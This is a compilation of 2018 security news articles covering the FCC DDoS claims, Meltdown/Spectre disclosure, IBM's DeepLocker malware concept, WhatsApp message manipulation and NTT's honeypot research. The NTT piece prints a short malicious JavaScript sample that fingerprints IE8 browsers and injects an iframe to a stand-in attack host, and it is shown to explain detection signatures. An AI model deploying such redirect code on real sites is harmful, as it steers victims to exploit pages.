STE WILLIAMS

“Attack” on FCC over net neutrality was legitimate traffic, report says

Oh, that poor, poor, net neutrality commenting system. If it wasn’t HBO’s John Oliver unleashing his flying monkeys on the Federal Communications Commission (FCC) – him with that site of his, giving people an actual, direct, non-convoluted way to get to the spleen-venting comments page – it was those gosh-darned distributed denial of service (DDoS) attacks.

As you may recall, in May 2017, the FCC was advancing its plan to curtail the USA’s net neutrality rules when Oliver served up an epic 19-minute rant inciting vast mobs of internet users to rise up and demand that the FCC get out of their faces.

At the height of the net neutrality debate, the commenting system struggled under the strain of responding to the mighty onslaught of visitors, leaving people stuck stewing in that spleen for a few days. At the time, FCC CIO Dr. David Bray blamed the bombardment on all those nasty hackers:

These were deliberate attempts by external actors to bombard the FCC’s comment system… While [it] remained up and running the entire time, these DDoS events tied up the servers and prevented them from responding to people attempting to submit comments.

Yes. Well. So. Anyway. About those DDoS attacks.

On Monday FCC Chairman Ajit Pai issued a statement ahead of an FCC Office of Inspector General (OIG) report that found that no evidence of DDoS attacks had been found.

The finding came to light after the FCC’s Office of Inspector General (OIG) investigated the supposed DDoS attacks. Pai said he’s glad that the report “debunks the conspiracy theory that my office or I had any knowledge that the information provided by the former CIO was inaccurate and was allowing that inaccurate information to be disseminated for political purposes.”

The fake DDoS news came from all those Obama hires that concocted the fictitious DDoS attacks, Pai said, thereby throwing CIO Bray and his underlings under the bus:

I am deeply disappointed that the FCC’s former [CIO], who was hired by the prior Administration and is no longer with the Commission, provided inaccurate information about this incident to me, my office, Congress, and the American people. This is completely unacceptable. I’m also disappointed that some working under the former CIO apparently either disagreed with the information that he was presenting or had questions about it, yet didn’t feel comfortable communicating their concerns to me or my office.

So if it wasn’t a cyberattack, what was it? According to the OIG report, released Tuesday, the comment system problems were most likely caused by a combination of “system design issues” and a massive surge in legitimate traffic after John Oliver told millions of TV viewers to flood the FCC’s website with pro-net neutrality comments.

The OIG investigators couldn’t “substantiate the allegations of multiple DDoS attacks” that Bray alleged – and which the FCC has alleged for over a year – the report says.

At best, the published reports were the result of a rush to judgment and the failure to conduct analyses needed to identify the true cause of the disruption to system availability.

Granted, the OIG report says, there was a smattering of “anomalous activity.” DoS attempts can’t be entirely ruled out during the period in question, from 7 May 2018 to 9 May 2018. Still, the report says…

We do not believe this activity resulted in any measurable degradation of system availability given the minuscule scale of the anomalous activity relative to the contemporaneous voluminous viral traffic.

The OIG said it was apparent from the get-go that the press releases about cyberattacks seemed to have been pulled out of thin air, given the lack of corroborating documentation:

We learned very quickly that there was no analysis supporting the conclusion in the [FCC] press release, there were no subsequent analyses performed, and logs and other material were not readily available.

Following the initial crash, the FCC explicitly blamed DDoS attacks. From the agency’s original statement:

Beginning on Sunday night at midnight, our analysis reveals that the FCC was subject to multiple distributed denial-of-service attacks (DDoS). These were deliberate attempts by external actors to bombard the FCC’s comment system with a high amount of traffic to our commercial cloud host. These actors were not attempting to file comments themselves; rather they made it difficult for legitimate commenters to access and file with the FCC. While the comment system remained up and running the entire time, these DDoS events tied up the servers and prevented them from responding to people attempting to submit comments. We have worked with our commercial partners to address this situation and will continue to monitor developments going forward.

The report also found that Pai’s office did nothing to inform the IT department about the oncoming onslaught of John Oliver-prompted traffic:

FCC Management was aware The Last Week Tonight with John Oliver program was considering an episode on the Net Neutrality proceeding but did not share that information with the CIO or IT group.

Bray, the former CIO, said the OIG never contacted him for the report and that he hadn’t had the opportunity to share what he observed or concluded during the incident.

When Gizmodo asked the FCC why investigators hadn’t questioned Bray, it got no response. But according to the publication, Bray has previously leaked “baseless” claims that the FCC was struck by another cyberattack in 2014. He was also the first FCC official to publicly claim that attackers had gone after the comment system last May – in spite of the FCC’s security team having found no evidence of malicious intrusion.

Late on Tuesday, Senator Ron Wyden put out a statement saying that the OIG report shows that the American people were deceived by the FCC and Chairman Pai as they went about doing the bidding of Big Cable.

Easier to do that than to listen to the majority of people who fought for net neutrality, he said:

It appears that maintaining a bogus story about a cyberattack was convenient cover to ignore the voices of millions of people who were fighting to protect a free and open internet.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/t3egZPr3-gM/

Google to warn companies targeted in government-backed attacks

Is your company running G Suite? If so, from August you’ll have the option to enable alerts if Google suspects government-backed hacking attempts on any of your accounts.

Since 2012, Google has been alerting individual Google account users if they suspect their account has been targeted by government-backed attackers using any number of phishing- or malware-based methods (malicious attachments, scripts embedded in files, dodgy links). This August update now offers these alerts to G Suite administrators as well so they can take action to protect their users.

In the case of suspected government-backed activity on an organization’s G Suite account, an email alert would go directly to the G Suite super admins – not the user. From there, the admins can then choose what to do with that information: Bolster security on that user’s account, share the information with other team members, and/or warn the user directly.

Google notes that “less than 0.1% of all Gmail users” receive a notification of potential government-backed attacks on their accounts, and the notification is not sent in real-time. Google also takes pains to note that:

  1. Their suspicion of an attack could very well be a false alarm.
  2. Google will not name the specific methods they’ve detected that could be triggering the alarm.
  3. Google will not attempt to attribute the attack to any party, government or nation.

In any case, since the notifications are light on details and aren’t sent in real-time, users and admins alike may be left scratching their heads wondering what exactly triggered this warning. This could be frustrating for G Suite administrators who might want this information to understand what kinds of targeted attacks are coming their organization’s way. However, Google argues that the end result is the same regardless of whether you’re a user or an admin: Take additional precautions to secure user accounts.

So what should you do if you are one of the extremely small percentage of users or admins who encounter this warning? After resetting the password, if you haven’t yet enabled two-factor authentication, it’s a very good next step to take.

Both individual and G Suite users can also opt to enroll in Google’s free Advanced Protection program, which offers above-and-beyond protections for users who might be frequent targets of government ire or potential meddling, like political candidates, reporters or activists. (To give you an idea of how this works, Advanced Protection has these users start with buying two physical security keys as a replacement for more standard 2FA tokens.)

Any admins wishing to enable this alert should log in to their G Suite console, click Reports, then Manage Alerts, and enable the “Government-backed attack” option, which is off by default. Google notes that this feature is rolling out to all G Suite admins over a 15 day period starting on 1 August, so if you don’t see the option just yet, it should be available soon.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/TfUG7Ecpcaw/

Discover the lurking dangers ahead at Sophos ‘See the Future’ event

Promo Cybersecurity software firm Sophos is inviting IT professionals to “See the Future” at The Brewery, near the Barbican in London, on Tuesday 9 October.

Starting at 8.45am and continuing until 4.15pm, this free event will include lunch in elegant 18th century surroundings. In between talks and breakout sessions, the experts from Sophos will cover everything from the latest ransomware threats to current trends in IT security and how to future-proof your organisation.

Attendees will gain an insider’s view on the company’s latest technology developments, the innovations it has in the pipeline and its business strategy.

Sophos CEO Kris Hagerman and Dan Schiappa, Senior Vice President and General Manager of Products, will be the main speakers. They will also be available for informal talks and questions.

Likely to be the star attraction will be keynote speaker Alexis Conran, best known for his appearances on The Real Hustle, the BBC3 programme exposing scams and cons. Cook, raconteur, magician, card-shark and hustler, Alexis will tell you everything you need to know about risk, communication and body language.

Curious about today’s threat landscape? In this breakout session, a virtual tour of SophosLabs will give attendees an insight into the current threat landscape and its impact on IT security. See a live demonstration of some of the data and bespoke systems SophosLabs uses to fend off today’s threats.

Crypto-ransomware looms over the threat landscape, not only fooling up-to-date anti-spam and web gateway appliances, but endpoint antivirus defences as well. Attend this breakout session to learn its history and explore today’s crypto-ransomware attacks. An overview of this shape-changing predator will benefit your wallet as well as your organisation’s productivity and intellectual properties.

Phishing attacks have seen a meteoric rise in the last year as attackers continue to share successful attack types. Find out how they have taken advantage of malware-as-a-service offerings on the dark web to step up attacks.

Register here to secure your place.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/discover_the_lurking_dangers_ahead_at_sophos_see_the_future_event/

Oh, No, Not Another Security Product

Let’s face it: There are too many proprietary software options. Addressing the problem will require a radical shift in focus.

Organizations and businesses of all types have poured money into cybersecurity following high-profile breaches in recent years. The cybercrime industry could be worth $6 trillion by 2022, according to some estimates, and investors think that there’s money to be made. But like generals fighting their last battle, many investors are funding increasingly complex point solutions while buyers cry out for greater simplicity and flexibility.

Addressing this problem requires a radical shift in focus rather than a change of course. Vendors and investors need to look beyond money and consider the needs of end users.

More Money, More Problems
London’s recent Infosecurity conference included more than 400 vendors exhibiting, while RSA in San Francisco boasted more than 600. And this only includes those with the marketing budgets and inclination to exhibit. One advisory firm claims to track 2,500 security startups, double the number of just a few years ago. Cheap money has created a raft of companies with little chance of IPO or acquisition, along with an even greater number of headaches for CISOs trying to make sense of everything.

The market is creaking from this trend, with Reuters reporting mergers and acquisitions down 30% in 2017, even as venture capital investment increased by 14%. But the real pain is being felt by CISOs trying to integrate upward of 80 security solutions in their cyber defenses, as well as overworked analysts struggling to keep up. The influx of cash also has caused marketing budgets to spike, leading to a market in which it is deemed acceptable for increasingly esoteric products to be promoted to CISOs as curing everything.

All of this feeds into a sense of “product fatigue” where buyers are frightened into paying for the latest black box solution, only to see their blood pressure spike when they find that they don’t have the necessary resources to deploy or support these tools. This situation does not benefit any of the parties — the overwhelmed CISO, the overly optimistic investors, or the increasingly desperate vendors caught in limbo between funding rounds when their concepts weren’t fully baked to begin with.

Addressing complex modern threats calls for sophisticated tools and products, but we cannot fight complexity with complexity. Security operations center teams cannot dedicate finite analyst capacity to an ever-expanding battery of tools. Fragmentation within the security suite weakens company defenses and the industry as a whole, and the drain on analysts’ time detracts from crucial areas such as basic resilience and security hygiene.

Platforms, Not Products
The industry doesn’t need more products, companies, or marketing hype. We need an overhaul of the whole approach to security solutions, not an improvement of components. Security should be built on platforms with a plug-and-play infrastructure that better supports buyers, connecting products in a way that isn’t currently possible.

Such platforms should be flexible and adaptable, rewarding vendor interoperability while punishing niche solutions that cannot be easily adopted. This would lead to collaboration within the industry and create a focus on results for end users, rather than increasingly blinkered product road maps. Such platforms could act as a magnifying glass for innovation, providing a sandbox to benchmark new technologies and creating de facto security standards in the process.

This move from proprietary architecture to open modular architecture is a hallmark of Clayton Christensen’s disruptive innovation theory, and it is long overdue within the security industry. Buyers will have greater control of their tech stacks, while vendors and investors will get to proof-of-concept faster, and see greater efficiency within the market.

One example of such a platform is Apache Metron, an open source security platform that emerged from Cisco. Metron has been adopted by a number of major security providers and provides a glimpse of what the future of security should look like.

Collaborating, creating industry standards, or making technologies open source does not mean that vendors can’t make money; in fact, the reverse is true. Customers will be more willing to invest in security solutions that they know are future-proofed, that don’t come with the dreaded “vendor lock-in,” and that simplify rather than further complicate their architecture. 

Like all of security, there are varying degrees of risk and reward, but this approach is starting to look like the only logical future in an increasingly frothy, confusing, and low return-on-investment field. There will be a correction in the security market, whether it is in a month or a year. The fundamentals that will cause this are already evident, so there is an excellent opportunity to learn the lessons in advance and minimize the pain by contributing toward the platforms of the future.

Related Content:

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Click for more info

Paul Stokes has spent the last decade launching, growing, and successfully exiting security and analytics technology companies. He was the co-founder and CEO of Cognevo, a market-leading security analytics software business that was acquired by Telstra Corporation. Prior to … View Full Bio

Article source: https://www.darkreading.com/endpoint/oh-no-not-another-security-product/a/d-id/1332453?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Revealed: El Reg blew lid off Meltdown CPU bug before Intel told US govt – and how bitter tech rivals teamed up

Black Hat Next time you leave things to the last minute, remember this well.

Despite having known about the Meltdown and Spectre security vulnerabilities for roughly six months, Intel and other chip giants still hadn’t warned the US government’s cybersecurity nerve-center by the time The Register blew the lid off the design flaws.

Chipzilla and its semiconductor-slinging rivals had planned to tell US-CERT – Homeland Security’s Computer Emergency Response Team – around January 3 that they were going to go public on January 9 with details of processor bugs that could be exploited by malware to steal sensitive information, such as passwords and crypto-keys, from PCs, Macs, smartphones, and other devices.

The chip designers had been alerted to the Meltdown and Spectre vulnerabilities months before, around June 2017, but kept everything hush-hush under a strict embargo as they worked on squashing the bugs.

On Tuesday, January 2, after piecing together snippets of Linux kernel source code changes, mailing list posts by software engineers, and clues whispered to us by industry insiders, El Reg broke the news that operating system makers were scrambling to rewrite portions of their software to mitigate what came to be known as Meltdown and Spectre.

That sparked another mad dash in the tech world, as the vendors that had planned to go public with patches, mitigations, and details of the design blunders in seven days’ time were now forced to scrap their embargo – and move disclosure forward to January 3.

dumpster fire

Woo-yay, Meltdown CPU fixes are here. Now, Spectre flaws will haunt tech industry for years

READ MORE

This timeline is according to industry bods appearing on a panel on Wednesday evening at this year’s Black Hat USA hacking conference in Las Vegas. The speakers were Art Manion of the Software Engineering Institute’s CERT Coordination Center (CERT/CC); Christopher Robinson of Red Hat; Eric Doerr of Microsoft; and Matt Linton of Google.

Their panel, titled “The True Story of Fighting Meltdown and Spectre,” sought to reveal what went on behind the scenes in the months, days, and hours leading up to The Register‘s exclusive. And, for what it’s worth, we vultures were not aware of any embargo, and did not receive any guidance from Intel’s PR team despite contacting it while preparing the piece.

On January 3, after Google, Red Hat, Intel, Arm, AMD, and others spilled the beans, CERT/CC, which is sponsored by the Department of Homeland Security, published an advisory based on this now-public information, having had no heads up. A day later, US-CERT issued its formal alert, noting it too had only found out about the bugs that week, on January 3, and referenced CERT/CC’s writeup.

This also explains why CERT/CC initially advised people on January 3 to replace their vulnerable processor hardware, as it had not been fully briefed on the availability and rollout of microcode patches and software mitigations. It corrected its advisory when it became clear less drastic options were available.

“The embargo holders had been planning to tell CERT a week before the embargo lifted,” Linton, whose job title at Google is chaos specialist, told The Register after the panel session. “Had they known, CERT could have advised people that patches were available but instead initially recommended those affected should replace their processors.”

Manion, a senior vulnerability analyst at CERT/CC, said somewhat jokingly that he was a little hurt not to have been told about the issue earlier. But, he said, that did at least allow him to get a decent Christmas break – a lot of kernel developers lost their festive holiday time to rewriting memory management code.

Eagle-eyed Googlers notified chip makers and designers in and around June 2017 that their speculative execution engines – used to prime processors with instructions to execute in order to run software as fast as possible – had various exploitable security shortcomings. In turn, operating system developers were alerted, as workarounds would require changes to kernels.

The upshot of the hardware-level bugs was that malware on a computer, JavaScript in a webpage, or a rogue logged-in user, could abuse the holes to lift secrets out of the operating system and other applications. So far, no miscreants have been caught exploiting the vulnerabilities in the wild, to the best of our knowledge. We suspect this is part due to the wide rollout of mitigations, and part due to there being better bugs for hackers to abuse.

Come together

The whole shebang sparked a remarkable collaboration between rivals, we’re told. “Months before the public learned about the challenges with speculative execution, defenders from hardware, platform, cloud, and service providers were working together around the clock building mitigations and coordinating a response to help protect the billions of users depending on their platforms,” the panel explained in their session blurb. “Along the way, competitors became partners, and an unprecedented level of information was shared.”

At first, every biz involved worked alone on the issue, until in the autumn of 2017 there was an unprecedented meet-up of engineers from fierce rivals. The goal: to develop better solutions to Meltdown and Spectre.

“We had the face-to-face in November,” said Doerr, general manager of the Microsoft Security Response Center. “It’s funny how rare that kind of meeting is. There was pushback at Microsoft that the legal arrangements would be hard. Honestly, I was blown away by the collaboration in the room. It was a leap of faith to trust that this was the right thing to do.”

Robinson, a Red Hat security team lead, said that given the thousands of people working on the project in secret, he was surprised the news didn’t leak earlier. But when it did, he got a call on January 3 saying the patches needed to be deployed that day.

Eight hours later, he was pushing out fixes. He told The Register that a lot of minor work still had to be done after the initial public disclosure as the disclosure date had been set for January 9.

“The attack is brilliant, it’s very creative, and it’s stunning no one found it earlier,” Robinson said. “Every year we push out 100 fixes for vulnerabilities more severe than Spectre, which we only rated as ‘important’ on our scale.”

Leno-doh!

During the panel discussion, the situation with Lenovo was brought up: there were claims earlier that Intel alerted the Chinese PC maker – and thus, via proxy, the Chinese government – about the CPU-level flaws before it warned the US government. Given the above timeline, we can imagine our story detonating the embargo in between Chipzilla warning the computer manufacturer and Uncle Sam.

spectre

How to (slowly) steal secrets over the network from chip security holes: NetSpectre summoned

READ MORE

An audience member introduced himself as a Lenovo staffer who was briefed of Meltdown and Spectre ahead of the planned disclosure date, and he denied the Chinese government had been made aware of the issue in advance. By his reckoning, only a couple of dozen people at Lenovo knew about the issue, and all were based in the US, apart from one developer in Japan.

Linton had been quizzed by US politicians somewhat miffed at the handling of the bug disclosures, and defended the decision not to tell the American government until literally the final week. He was told the US administration could have taken some actions, such as moving sensitive virtual machines to an environment where the vulnerabilities definitely could not be exploited. Frankly, he said, he was shocked the government wasn’t already doing this already as basic operational security.

One of the key points your humble hack picked up from the panel session, apart from the CERT timing kerfuffle, was the collaboration between bitter rival corporations, that face-to-face communications are incredibly important, and is something the industry should encourage more – with one important restriction.

“It really is all about communications,” Linton said. “But the rules have to be that no one throws shade at anyone else. This nascent sense of cooperation is something we want to nurture. The one thing what will kill it is a press release in which someone claims to be better [at security] than the others in the group.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/meltdown_spectre_cert_timing/

Should I infect this PC, wonders malware. Let me ask my neural net…

Black Hat Here’s perhaps a novel use of a neural network: proof-of-concept malware that uses AI to decide whether or not to attack a victim.

DeepLocker was developed by IBM eggheads, and is due to be presented at the Black Hat USA hacking conference in Las Vegas on Thursday. It uses a convolutional neural network to stay inert until the conditions are right to pounce.

When samples of software nasties are caught by security researchers, they can be reverse-engineered to see what makes them tick, and what activates their payload, which is the heart of the malicious code that spies on the infected user, steals their passwords, holds their files to ransom, and so on. These payloads can be triggered by all sorts of things, from the country in which the computer is located, whether or not it is running in a virtual machine, how long the machine has been idle, etc.

This is all information that network defenders and antivirus tools can use to thwart or mitigate the spread and operation of the software. However, while it’s possible to reverse-engineer simple heuristic checks within a malicious program, to figure out the trigger conditions, it’s rather hard to work out what will make a trained neural network run a payload, just by studying its data structure.

Similarly, if the payload is encrypted, it’s possible the decryption key can be figured out from the heuristic code that unlocks it. However, if the payload is encrypted using a key derived from a neural network’s output, and you can’t easily reverse-engineer the network, you’ll have a hard time making it up cough up the right key and decrypting the payload.

Deep, man

To demonstrate this, IBM took a copy of the WannaCry ransomware, encrypted and hid it in a benign video-conference app, and wrapped machine-learning code around it that used a trained neural network to cough up the key to unlock and run the file-scrambling WannaCry payload.

That neural network was trained to recognize a particular victim’s face from the computer’s front-facing camera. When it spotted the right person in front of the PC, it provided the key needed to unlock the payload so it could be executed, and hold the system’s documents to ransom.

Robot hand holding cards

You should find out what’s going on in that neural network. Y’know they’re cheating now?

READ MORE

The ingenious part is that it turns what many consider a major weakness of neural networks into a strength. Neural networks are frustratingly difficult to understand since they act like black boxes, it’s difficult to study how they arrive at their final answer from a given input just by looking at how individual neurons in the system are fired.

“A simple ‘if this, then that’ trigger condition is transformed into a deep convolutional network of the AI model that is very hard to decipher,” Marc Stoecklin, a principal research scientist and manager of IBM’s Cognitive Cybersecurity Intelligence group, explained. “In addition to that, it is able to convert the concealed trigger condition itself into a ‘password’ or ‘key’ that is required to unlock the attack payload.”

Since it’s difficult to work out what triggers the payload, such a model would be very difficult to tackle, the researchers argued. Rest assured, however: the IBMers have not released any code, and there’s no sign of any malware using this machine-learning technique in the wild.

“While a class of malware like DeepLocker has not been seen in the wild to date, these AI tools are publicly available, as are the malware techniques being employed — so it’s only a matter of time before we start seeing these tools combined by adversarial actors and cybercriminals,” said Stoecklin.

“In fact, we would not be surprised if this type of attack were already being deployed. The security community needs to prepare to face a new level of AI-powered attacks. We can’t, as an industry, simply wait until the attacks are found in the wild to start preparing our defenses. To borrow an analogy from the medical field, we need to examine the virus to create the ‘vaccine.'” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/neural_network_malware/

WhatsApp security snafu ‘could allow message manipulation’

Researchers have uncovered security shortcomings in WhatsApp that create a means for hackers to intercept and manipulate messages sent in both private and group conversations.

Protocol decryption cleared the path to chat manipulation, boffins at Israeli security firm Check Point discovered.

Researchers at Check Point first converted WhatsApp’s (encrypted) protobuf2 data to Json. They then developed extensions to the popular Burp Suite that they claimed facilitated three manipulation methods, allowing them to:

  1. alter the text of someone else’s reply, essentially putting words in their mouth;
  2. use the “quote” feature in a group conversation to change the identity of the sender, even if that person is not a member of the group; and
  3. send a private message to another group participant that is disguised as a public message for all, so when the targeted individual responds, it’s visible to everyone in the conversation.

The white hat hackers said they’d found it was possible to fake messages and sow the seeds of all sorts of confusion. All the techniques involve social engineering tactics to hoodwink end users, as explained at some length in a blog post by Check Point here.

Kevin Bocek, chief cybersecurity strategist at machine identity protection vendor Venafi, told us: “This was a serious flaw and it’s made possible thanks to machine identities – encryption keys and digital certificates that enable privacy and authentication between our devices, apps, and clouds.”

El Reg asked Facebook/WhatsApp to comment but we’re yet to receive a response. We’ll update this story as and when more information comes to hand. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/whatsapp_message_manipulation/

How evil JavaScript helps attackers tag possible victims – and gives away their intent

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT’s Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC) here. In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it’s worth watching to see if malware authors are using it that way.

Takata’s group identified five evasion techniques that all abuse differences between JavaScript implementations, he stated, which is more complex than familiar redirection attacks that look at the User-Agent and redirect victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

var ua = navigator.userAgent; 
     if(ua.indexOf(“MSIE 8”)  -1) { 
     var ifr = document.createElement("iframe"); 
     ifr.setAttribute("src", “http://mal.example/ua=”+ ua);
     document.body.appendChild(ifr);
}

It matters, Takata said, because the evasion techniques identified in the research can serve as attack signatures.

The NTT team took two approaches to traffic collection: a “high interaction” honeyclient (a real browser designed to detect browser exploits), and a “low interaction” honeyclient that can “emulate many different client profiles, trace complicated redirections and hook code executions in detail”.

Over several years, the NTT group collected and analysed 8,500 JavaScript samples from 20,000-plus malicious sites, and found five previously unseen evasion techniques as shown below.

Takata wrote that of these setTimout() provided the best indicator of compromise (IOC) – mainly because the other four aren’t in current use.

That particular function helped attackers identify IE 8 and IE 9 browsers, because they return an “Invalid argument” error if a site asks them to process setTimeout(10); Firefox and Chrome don’t.

That code turned out to be the strongest IOC of the five evasive code snippets NTT identified in its scan of more than 860,000 URLs: all of the 26 URLs that served up setTimeout(10) were in compromised websites, members of a mass “Fake jQuery” injection campaign. The other samples turned out to be either benign, or no longer in use. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/how_evil_javascript_helps_attackers_tag_possible_victims_and_gives_away_their_intent/

Stress, bad workplace cultures are still driving security folk to drink

Black Hat In a personal and powerful presentation, a computer security veteran has warned that too many infosec bods are fighting a losing battle with the bottle.

Jamie Tomasello, senior manager of security operations at Duo Security, has 17 years of experience in the industry, and has been sober for the past six. While the causes of alcoholism are down to many factors, including genetics, practices within the security industry make it a lot harder to deal with dangerous levels of addiction, and it stops people from speaking out.

“Even after 17 years, I’m more afraid of disclosing I’m a recovering alcoholic than any vulnerability I’ve found in code,” Tomasello told this year’s Black Hat USA attendees in Las Vegas on Wednesday. “Our work environments work against us and we push ourselves to run on empty far more than we should.”

A key factor is stress. Security professionals often work long hours, have to be instantly on call for emergencies, and the consequences of messing up on the job can be massive. When humans get stressed, the brain floods with cortisol, increasing the heart rate and blood pressure, triggering sweating and increasing breathing. This “fight or flight” reaction is a product of our evolution, and is an essential survival tool.

Chemistry

However, being stressed repeatedly does change the brain’s chemistry somewhat, and it’s found that chronic drinkers also display very high levels of cortisol. There is a clear relationship here, with stress helping to form addictive behaviors, Tomasello warned, and encouraging damaging levels of addiction to take root.

Workplace culture also doesn’t help. Many offices have beer on tap, wine in the fridge, and hard liquor on the shelves as a perk for employees, and that increases the temptation to problem-drink. Many company events are also either held in bars, or stocked with copious amounts of booze.

There’s also the social stigma, and a lack of understanding: some people can manage their drink, and yet are unable to manage those who can’t. Tomasello recounted how one boss, who knew of her condition, would still encourage her to sink a tipple with the team.

“We don’t tell people with diabetes, ‘Go on have the cupcake,’ so why treat anyone with substance problems any differently,” she said.

There are also false myths to deal with. Some people think that the longer you have been sober, the easier it is to stay on the wagon. However, she said the past year of sobriety has been the hardest for her, and sometimes she just had to take it one day at a time.

Some coping strategies work better than others. Tomasello said she actively encourages staff to take their full vacation allowance, so they can unwind, destress, and let their brains get back into shape without having to self-medicate with grog. She also advised tipping a bartender at the start of the night to just serve you non-alcoholic drinks.

If people are at hotels for conventions, or at the airport on the way, another technique is to ask a staffer if “A friend of Bill W,” has checked in. This is code for asking where the nearest Alcoholics Anonymous meeting is – AA was started by William Wilson – and many places have staff trained to let you know where meetings are being held.

Tomasello insisted she isn’t anti-alcohol, nor trying to start a temperance movement, and instead urged delegates to do what they can to help colleagues who are suffering from substance issues, and to destress staff – rather than distress – as much as possible to stop things getting worse. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/08/infosec_professionals_alcohol/

Microsoft to hackers: Finding Hyper-V bugs is hard. Change my mind. PS: Here’s a head start…

Black Hat Not that many moons ago, Microsoft was seemingly reluctant to open a bug bounty program. It also once described Linux as a cancer. Now it claims to love Linux, and is offering bounties on bugs. How times change.

On Wednesday, Redmond not only reiterated its offer of oodles of cash in exchange for details of exploitable vulnerabilities in Hyper-V, it went as far as telling hackers the best places to look for lucrative mistakes in its hypervisor software.

In a presentation at this year’s Black Hat USA conference in Las Vegas, Microsoft security engineers Joe Bialek and Nicolas Joly spent nearly an hour going through the defense mechanisms and architecture within Hyper-V, and suggesting the best areas to hunt for programming blunders. The Windows hypervisor is also, for what it’s worth, documented in various levels of detail here and here and here.

If someone can find a way to exploit Hyper-V, they could be looking at a $250,000 payout – and Bialek said Microsoft would be keen to cough up.

“Finding bugs in Hyper-V is very hard,” he told the crowd, “so we pay out the maximum bounty more often than not for them.”

Microsoft adds all of Windows – including Server – to extended bug bounty program

READ MORE

He advised hackers not to spend too much time on the hypervisor itself. Rather, a much more promising area is the root partition, aka the parent partition, as this has access not only to physical memory, it has control over devices, and is responsible for services used by software in other partitions on the system. What Redmond calls a partition, you could call a virtual machine instance.

The root partition also implements emulated hardware as well as providing paravirtualized networking, storage, video, and PCI devices, which makes it a crucial and inviting component.

The low-level communications channels between partitions and the hypervisor are also worth exploring – particularly the VMBus, which is a high-speed software interface between partitions and the root partition which has all those goodies inside it.

The duo acknowledged there are still a few bugs to be found – all code has flaws, and more than 40 have been discovered in the past year in Hyper-V. There are bounties for all kind of vulnerabilities with the software, with rewards ranging from $5,000 up to the quarter-of-a-million jackpot, and you can check out the full list, here. Good luck. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/hyperv_hacking/